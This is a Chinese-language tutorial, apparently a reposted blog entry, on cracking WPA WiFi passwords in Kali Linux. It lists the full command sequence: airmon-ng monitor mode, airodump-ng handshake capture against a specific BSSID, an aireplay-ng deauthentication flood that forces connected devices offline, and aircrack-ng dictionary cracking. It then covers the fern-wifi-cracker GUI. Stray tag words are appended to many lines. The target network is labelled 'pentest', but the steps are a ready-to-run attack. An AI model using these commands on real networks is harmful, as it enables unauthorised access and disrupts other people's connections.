之前學Kali,不少人都笑贊「WiFi破解神器」。我很煩,一是我不會破解二是我以爲他們也不會破解三是我隱約以爲所謂的WiFi破解不是什麼技術性的操做。php
後來基礎知識充分了而後弄了個無線網卡,弄個弱密碼跟着網上教程敲幾條命令就「破解了」,確實不須要什麼技術知識也沒什麼操做性。算法
也所以沒作什麼記錄,但最近須要演示時發現忘了具體操做步驟,所以從新整理一下記錄下來。工具
網卡不必用什麼官方推薦的幾百塊錢的,甚至只在國外賣的。某淘上說支持Kali評論也說能夠的基本都沒問題。加密
WEP破解和WPA破解操做有些不同,但一是WEP協議有漏洞使用破解很容易如今也基本沒人用了,二是我這裏沒有WEP型WiFi,因此這裏只講WPA破解。spa
airmon-ng
9表示第9信道(channel 9)。使用iwconfig確認成功開啓,主要表現是網卡名由wlan0變爲wlan0mon,Mode值爲Monitorcode
airmon-ng start wlan0 9
iwconfig
airodump-ng wlan0mon
BSSID----wifi的mac地址、PWR----信號強度(結果通常是按強度排序)、Data----監聽期間流量總合、CH----wifi所用信道、ENC----加密算法、ESSID----wifi名稱blog
看到本身要破解的wifi後直接按Ctrl+C終止命令便可。咱們這裏的目標是名爲pentest的wifi,其BSSID爲B0:D5:9D:42:FA:A3,信道爲11排序
# -c指定信道,必定要是上一步查到的要破解的wifi所用信道 # -bssid指定bssid值,必定要是上一步查到的要破解的wifi的bssid # -w指定捕獲的握手到保存到的文件名 airodump-ng -c 11 --bssid B0:D5:9D:42:FA:A3 -w /root/Desktop/wifi_ivs_file wlan0mon
在上一步中咱們是被動等待,咱們什麼時候能抓取到握手包依賴於什麼時候有設備與該wifi完成成功的認證。教程
但對於上一步這種有已鏈接設備的wifi,其實咱們能夠使用aireplay-ng進行deauth洪水攻擊使已鏈接他的設備掉線,掉線設備通常會自動從新鏈接wifi這樣咱們就能輕鬆獲取握手包。get
保持上步抓包命令不中斷,新打開一個窗口執行:
# -0表示通知設備斷開鏈接 # 10表示deauth攻擊次數,小點大點都行吧 # -a指定仿造的wifi的mac地址(即bssid) # -c表示要讓認證失效的設備的mac地址,在上一步中能夠看到 aireplay-ng -0 10 -a B0:D5:9D:42:FA:A3 -c C4:F0:81:02:87:5E wlan0mon
以下圖所示,咱們抓到了讓其從新認證的B0:D5:9D:42:FA:A3的握手包。使用Ctrl+C終止抓包命令便可
此時會在指定的目錄產生如下四個文件(每執行一次抓包命令就會產生一組,因此抓包時要注意本身是第幾回執行的;無論也行下一步執定文件時使用*號通配符便可)
# -w指定要使用口令字典文件 # -b指定要目標wifi的mac地址(亦即bssid) # wifi_ivs_file*.cap是抓取到握手包的數據包文件,*是通配符 aircrack-ng -w /usr/share/nmap/nselib/data/passwords.lst -b B0:D5:9D:42:FA:A3 /root/Desktop/wifi_ivs_file*.cap
若是字典文件中存在wifi的密碼,那就能找到wifi的密碼,若是不包含那就找不到。(因此籠統地講wifi成功破解率依賴於字典大小)
在第二步中咱們使用airmon-ng將網卡以監聽模式啓動,最後咱們將網卡還原回去
airmon-ng stop wlan0mon
iwconfig
Aircrack-ng破解說難也不難,但說容易先後幾條命令及參數都不同記起來仍是有點麻煩的,這種順序性操做若是使用圖形界面工來進行那就方便多了。
fern wifi cracker正是將Aircrack-ng這幾步圖形界面化的工具。
將無線網卡插好到kali,使用命令啓動fern wifi cracker
fern-wifi-cracker
第一步選擇網卡、第二步掃描wifi、第三步選擇wifi類型進入破解頁面
第一步雙擊選定要破解的wifi、第二步Browse選擇口令字典文件、第三步點擊Attack開始破解、第四步若是破解成功口令會如圖在4處列出(右鍵可複製)
參考: